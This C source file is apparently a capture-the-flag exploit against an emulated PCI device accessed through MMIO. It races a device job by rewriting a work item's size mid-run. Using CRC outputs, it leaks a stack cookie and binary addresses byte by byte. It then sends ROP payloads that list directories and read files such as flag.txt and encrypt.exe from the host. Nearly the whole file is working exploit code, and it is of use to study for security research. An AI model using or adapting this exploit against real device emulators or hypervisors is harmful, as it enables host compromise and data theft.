#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

#include "mmio_config.h"
#include "mmio_mgt.h"
#include "crc32.h"
#include "rop.h"
#include "log.h"

# define __force	__attribute__((force))

extern void *mmio_area;

typedef struct {
    uint64_t n_element;
    uint64_t n_thread;
    uint64_t unk[2];
} thread_config_t;

typedef struct {
    off_t addr;
    size_t size;
    unsigned int crc;
    uint32_t unk;
    uint64_t other;
} workitem_t;

typedef struct {
    thread_config_t thread_config;
    workitem_t items[0];
} config_area_t;

static inline uint32_t __raw_readl(const volatile void *addr)
{
	return *(const volatile uint32_t __force *)addr;
}

static inline uint64_t __raw_readq(const volatile void *addr)
{
	return *(const volatile uint64_t __force *)addr;
}

# define __iomem	__attribute__((noderef, address_space(__iomem)))

static inline void __raw_writel(uint32_t value, volatile void __iomem *addr)
{
	*(volatile uint32_t __force *)addr = value;
    // __asm__("CLFLUSH (%%rax)" : : "r" (addr));
}

static inline void __raw_writeq(uint64_t value, volatile void *addr)
{
	*(volatile uint64_t __force *)addr = value;
    // __asm__("CLFLUSH (%%rax)" : : "r" (addr));
}

#define mmio_reg_write32(off, value)        __raw_writel(value, (char*)mmio_area+off)
#define mmio_reg_write64(off, value)        __raw_writeq(value, (char*)mmio_area+off)

#define mmio_reg_read32(off)                __raw_readl((char*)mmio_area+off)
#define mmio_reg_read64(off)                __raw_readq((char*)mmio_area+off)

/*
 * Switch to development mode; this allow to get some logs.
 *
 * Parameter:
 *      None
 * 
 * Return value:
 *      0 or error code.
 */
int __attribute__((noinline)) pci_send_switch_to_devmode(void)
{
    mmio_reg_write64(OFF_REG_MODE, DEVMODE);
    return 0;
}

int __attribute__((noinline)) pci_is_working(void)
{
    return STATUS_WORKING == mmio_reg_read64(OFF_REG_MULTI_STATUS);
}

int __attribute__((noinline))  pci_is_ready(void)
{
    return STATUS_READY == mmio_reg_read64(OFF_REG_MULTI_STATUS);
}

int __attribute__((noinline)) is_job_finished(uint32_t *p_crc)
{
    return __raw_readl(p_crc) != -2;
}

/*
 * Before calling this function (for multi mode) we must ensure that the buffer
 * contains the information required for the setup (n_thread, n_xx).
 * 
 * Parameter:
 *      addr        -       address of the buffer
 *      size        -       size of the buffer
 * 
 * Return value:
 *      0 or error code.
 */
int __attribute__((noinline)) pci_send_start(off_t addr, size_t size)
{
    mmio_reg_write64(OFF_REG_MULTI_ADDR, addr);
    mmio_reg_write64(OFF_REG_MULTI_SIZE, size);

    mmio_reg_write64(OFF_REG_MULTI_STATUS, STATUS_PREPARE);

    int k = 0;
    while (!pci_is_ready() || k++ > 1000) {}

    mmio_reg_write64(OFF_REG_MULTI_STATUS, STATUS_GO);
}

int pci_send_prepare(void)
{
    mmio_reg_write64(OFF_REG_MULTI_STATUS, STATUS_PREPARE);
}

int __attribute__((noinline)) pci_send_abort(void)
{
    mmio_reg_write64(OFF_REG_MULTI_STATUS, STATUS_ABORT);
}

int allocate_job_area(size_t size, mem_descriptor_t **p_memdesc)
{
    return allocate_and_map_physical(size, p_memdesc);
}

int deallocate_job_area(mem_descriptor_t *memdesc)
{
    return deallocate_and_unmap_physical(memdesc);
}

int allocate_worker_config_area(int n_elem, int n_thread, mem_descriptor_t **p_memdesc)
{
    return allocate_and_map_physical(sizeof(thread_config_t) + n_elem * sizeof(workitem_t), p_memdesc);
}

int deallocate_worker_config_area(mem_descriptor_t *memdesc)
{
    return deallocate_and_unmap_physical(memdesc);
}

// int setup_test_job(int n_elem, int n_thread)
// {
//     int res = 0;
//     mem_descriptor_t *memdesc_config = NULL;
//     mem_descriptor_t *memdesc_job = NULL;

//     if (allocate_worker_config_area(n_elem, n_thread, &memdesc_config) < 0)
//     {
//         printf("Failed to allocate worker config area\n");
//         res = -1;
//         goto out;
//     }

//     config_area_t *config = memdesc_config->vaddr;
//     config->thread_config.n_element = n_elem;
//     config->thread_config.n_thread = n_thread;

//     if (allocate_job_area(0x500, &memdesc_job) < 0)
//     {
//         printf("Failed to allocate job area\n");
//         res = -1;
//         goto out;
//     }

//     memset(memdesc_job->vaddr, 0x41, 0x500);

//     if (crc32(memdesc_job->vaddr, 0x400) != 0xb737fb1a)
//     {
//         printf("Bad CRC calculation\n");
//         res = -1;
//         goto out;
//     }

//     int jobid_min = 0;
//     int jobid_max = jobid_min+1;
//     int step = 0x1000;

//     for (int jobid = jobid_min; jobid < jobid_max; jobid++)
//     {
//         printf("Testing for jobid %d\n", jobid);

//         // Trying to dump
//         for (uint32_t off = 0x18; off < 0x20; off++)
//         {
//             printf("Testing for offset %x\n", off);
//             size_t new_size = 0x400+off;
//             uint32_t ref_crc = crc32(memdesc_job->vaddr, new_size);

//             for (int j = 0xa1c000-100*0x1000; j < 0xe89e60; j += step)
//             {
//                 for (int i = 0; i < n_elem; i++)
//                 {
//                     config->items[i].addr = memdesc_job->paddr;
//                     config->items[i].size = 0x400;// memdesc_job->size;
//                     config->items[i].crc = -2;// 0x49975b13; // crc32()
//                 }

//                 // printf("Starting job for j = %d\n", j);
//                 pci_send_start(memdesc_config->paddr, memdesc_config->size);

//                 uint64_t k = 0;
//                 while (1)
//                 {
//                     if (k++ == j)
//                         config->items[jobid].size = new_size;
                    
//                     if (config->items[jobid].crc != -2)
//                     {
//                         // printf("Stored CRC[%d] = %08x -> %lx\n", jobid, config->items[jobid].crc, k);
//                         break;
//                     }
//                     // k++;
                        
//                     // printf("Job working ...\n");
//                 }
//                 // printf("Loop count: %d\n", k);

//                 // printf("Job done, dumping CRC values:\n");
//                 // for (int i = 0; i < n_elem; i++)
//                 // {
//                 //     printf("CRC[%d] = %08x\n", i, config->items[i].crc);
//                 // }

//                 uint32_t crc = config->items[jobid].crc;
//                 // if (crc != 0x31f81046)
//                 // if (crc == 0xb737fb1a)

//                 if (crc != 0xb737fb1a && crc != ref_crc)
//                 {
//                     printf("Found different CRC[%d] = %08x, for iteration %d\n", jobid, crc, j);
//                     break;
//                 }
//             }
//         }   
//     }
    

// out:
//     if (1)
//     {
//         if (memdesc_config != NULL)
//             deallocate_worker_config_area(memdesc_config);

//         if (memdesc_job != NULL)
//             deallocate_job_area(memdesc_job);
//     }
// }

int setup_test_job(
    int n_elem,
    int n_thread,
    void (*callback)(mem_descriptor_t *memdesc_config, mem_descriptor_t *memdesc_job, config_area_t*config, void *data),
    void *data
) {
    int res = 0;
    mem_descriptor_t *memdesc_config = NULL;
    mem_descriptor_t *memdesc_job = NULL;
    size_t area_size = 0x380000;

    printf("Setting up job\n");

    if (allocate_worker_config_area(n_elem, n_thread, &memdesc_config) < 0)
    {
        printf("Failed to allocate worker config area\n");
        res = -1;
        goto out;
    }

    // size_t saved_size = memdesc_config->size;
    // memdesc_config->size = sizeof(thread_config_t) + n_elem * sizeof(workitem_t);

    config_area_t *config = memdesc_config->vaddr;
    config->thread_config.n_element = n_elem;
    config->thread_config.n_thread = n_thread;

    if (allocate_job_area(area_size, &memdesc_job) < 0)
    {
        printf("Failed to allocate job area\n");
        res = -1;
        goto out;
    }

    memset(memdesc_job->vaddr, 0x41, area_size);

    if (crc32(memdesc_job->vaddr, 0x400) != 0xb737fb1a)
    {
        printf("Bad CRC calculation\n");
        res = -1;
        goto out;
    }

    printf("Setup done\n");
    
    callback(memdesc_config, memdesc_job, config, data);

out:

    // memdesc_config->size = saved_size;
    if (1)
    {
        if (memdesc_config != NULL)
            deallocate_worker_config_area(memdesc_config);

        if (memdesc_job != NULL)
            deallocate_job_area(memdesc_job);
    }
}

typedef struct {
    off_t off;
    size_t size;
    void *buffer;
} leak_buffer_param_t;

void leak_buffer_callback(
    mem_descriptor_t *memdesc_config,
    mem_descriptor_t *memdesc_job,
    config_area_t*config,
    void *data)
{
    int step = -0x100;
    uint32_t prev_crc = 0xb737fb1a;
    leak_buffer_param_t *param = data;
    uint8_t *buffer = param->buffer;
    size_t start_off = param->off;

    // int start_j = 0xa1c000-500*0x1000;
    // int start_j = 0x1988000; // original low bound
    int start_j = 0x2000;
    // int start_j = 38125568;
    // int end_j   = 0xe89e60;
    int end_j   = 0x5118000;

    printf("leak_buffer_callback\n");

    for (uint32_t off = 0; off < param->size + 1;)
    {

        size_t new_size = (start_off == 0x400 && off == 0) ? start_off + (++off) : start_off+off;
        uint32_t ref_crc = crc32(memdesc_job->vaddr, new_size);

        // printf("Testing for offset %#x, new size %#lx\n", off, new_size);

        for (int j = start_j; j < end_j && j > 0; j += step)
        // for (int j = 0xa1c000; ; )
        {
            for (int i = 0; i < config->thread_config.n_element; i++)
            {
                config->items[i].addr = memdesc_job->paddr;
                config->items[i].size = 0x400;
                config->items[i].crc = -2;
            }

            // printf("Sending start\n");

            pci_send_start(memdesc_config->paddr, memdesc_config->size);

            // hexdump(mmio_area, 0x1000);

            // printf("First loop\n");

            // size_t *p_newsize = &config->items[0].size;
            size_t *p_newsize = &config->items[1].size;
            uint32_t *p_crc0 = &config->items[0].crc;
            uint32_t *p_crc1 = &config->items[1].crc;
            uint64_t k = 0;

            while (!is_job_finished(p_crc0)) { asm(""); }

            while (1)
            {
                if (k++ == j)
                {
                    __raw_writeq(new_size, p_newsize);
                    break;
                }
                asm("");        
            }

            // printf("Second loop\n");

            while (!is_job_finished(p_crc1)) { asm(""); }

            uint32_t crc = config->items[1].crc;

            if (crc != 0xb737fb1a && crc != ref_crc)
            {
                // printf("Found different CRC = %08x, for iteration %#x\n", crc, j);
                if (off > 0)
                {
                    uint64_t diff = crc32_rev(prev_crc, crc);
                    // printf("Leaked byte %lx\n", diff);
                    buffer[off-1] = diff;

                    // start_j = j - 100 * 0x1000;
                    // end_j = j + 100 * 0x1000;
                    // step = 0x800;
                }
                prev_crc = crc;
                off++;
                break;
            }

            // printf("CRC value found %x for j = %#x\n", crc, j);
        }
    }
}

void trigger_code_execution(
    mem_descriptor_t *memdesc_config,
    mem_descriptor_t *memdesc_job,
    config_area_t*config,
    void *data)
{
    int step = 0x1;
    int start_j = 0x10;
    int end_j   = 0x60;
    // size_t new_size = build_signal_minimal((char*)memdesc_job->vaddr);
    // size_t new_size =  build_virtual_alloc(memdesc_job->vaddr, memdesc_config->vaddr);
    // size_t new_size =  build_read_file(memdesc_job->vaddr, memdesc_config->vaddr, 0x60, "C:\\exploits\\flag.txt", memdesc_job->paddr);
    // size_t new_size =  build_read_file(memdesc_job->vaddr, memdesc_config->vaddr, 0x60, "C:\\Windows\\System32\\cmd.exe", memdesc_job->paddr);
    // size_t new_size =  build_read_file(memdesc_job->vaddr, memdesc_config->vaddr, 0x60, "C:\\exploits\\encrypt.exe", memdesc_job->paddr);
    // size_t new_size =  build_read_file(memdesc_job->vaddr, memdesc_config->vaddr, 0x60, "C:\\exploits\\flag.txt", memdesc_job->paddr);
    // size_t new_size =  build_read_file(memdesc_job->vaddr, memdesc_config->vaddr, 0x60, "C:\\exploits\\test.py.enc", memdesc_job->paddr);
    // size_t new_size =  build_read_file(memdesc_job->vaddr, memdesc_config->vaddr, 0x60, "C:\\exploits\\test.py.raw~", memdesc_job->paddr);
    // size_t new_size =  build_read_file(memdesc_job->vaddr, memdesc_config->vaddr, 0x60, "C:\\exploits\\0day.py.enc", memdesc_job->paddr);
    size_t new_size =  build_dir_listing(memdesc_job->vaddr, memdesc_config->vaddr);

    printf("Trying to exec payload with total size %#lx\n", new_size);
    hexdump((char*)memdesc_job->vaddr + 0x400, new_size - 0x400);

    // return;

    for (int j = start_j; j < end_j; j += step)
    {
        for (int i = 0; i < config->thread_config.n_element; i++)
        {
            config->items[i].addr = memdesc_job->paddr;
            config->items[i].size = 0x400;
            config->items[i].crc = -2;
        }

        size_t *p_newsize = &config->items[1].size;
        uint32_t *p_crc0 = &config->items[0].crc;
        uint32_t *p_crc1 = &config->items[1].crc;
        uint64_t k = 0;

        pci_send_start(memdesc_config->paddr, memdesc_config->size);

        while (!is_job_finished(p_crc0)) { asm(""); }

        while (1)
        {
            if (k++ == j)
            {
                __raw_writeq(new_size, p_newsize);
                break;
            }
            asm("");        
        }

        while (!is_job_finished(p_crc1)) { asm(""); }

        // Just for debug purpose
        uint32_t crc = config->items[1].crc;
        // printf("CRC value found %#x for j = %#x\n", crc, j);

        // printf("Address value found %#lx for j = %#x\n", config->items[1].addr, j);

        if (config->items[0].addr != memdesc_job->paddr)
        {
            printf("Code execution triggered !!!!\n");
            break;
        }
    }

    pci_send_abort();
    // sleep(1);
    usleep(1000*100);
    uint64_t leaked_value = __raw_readq(&config->items[2].addr);
    printf("Final address value found %#lx\n", leaked_value);
    printf("Config data:\n");
    hexdump(memdesc_config->vaddr, 0x200);
    // printf("Job data:\n");
    // hexdump(memdesc_job->vaddr, 0x400);
    printf("Buffer is at %#lx\n", memdesc_job->paddr);

    dump_to_file("/root/encrypt.exe", memdesc_job->vaddr, memdesc_job->rounded_size);
}

void leak_info(void)
{
    uint64_t stack_content[3] = {0ul, 0ul, 0ul};
    leak_buffer_param_t param = {
        .buffer = stack_content,
    };

    printf("Starting leaking phase...\n");

    param.size = 8;
    param.off = 0x400;
    setup_test_job(2, 1, leak_buffer_callback, &param);
    init_stack_cookie(stack_content[0]);
    printf("Leaked stack cookie:      %#016lx\n", stack_content[0]);

    param.size = 0x10;
    param.off = 0x418;
    setup_test_job(2, 1, leak_buffer_callback, &param);
    init_slide(stack_content[0]);
    init_workitem(stack_content[1]);
    printf("Leaked binary address:    %#016lx\n", stack_content[0]);
    printf("Leaked work item address: %#016lx\n", stack_content[1]);

    // uint8_t buffer[0x70] = {0};
    // param.buffer = buffer;
    // param.size = sizeof(buffer);
    // param.off = 0x400;
    // setup_test_job(2, 1, leak_buffer_callback, &param);
    // printf("Stack content:\n");
    // hexdump(buffer, sizeof(buffer));
    // init_ref_buffer(buffer, sizeof(buffer));
}

void exec_payload(void)
{
    printf("Starting code execution phase...\n");
    setup_test_job(2, 1, trigger_code_execution, NULL);
}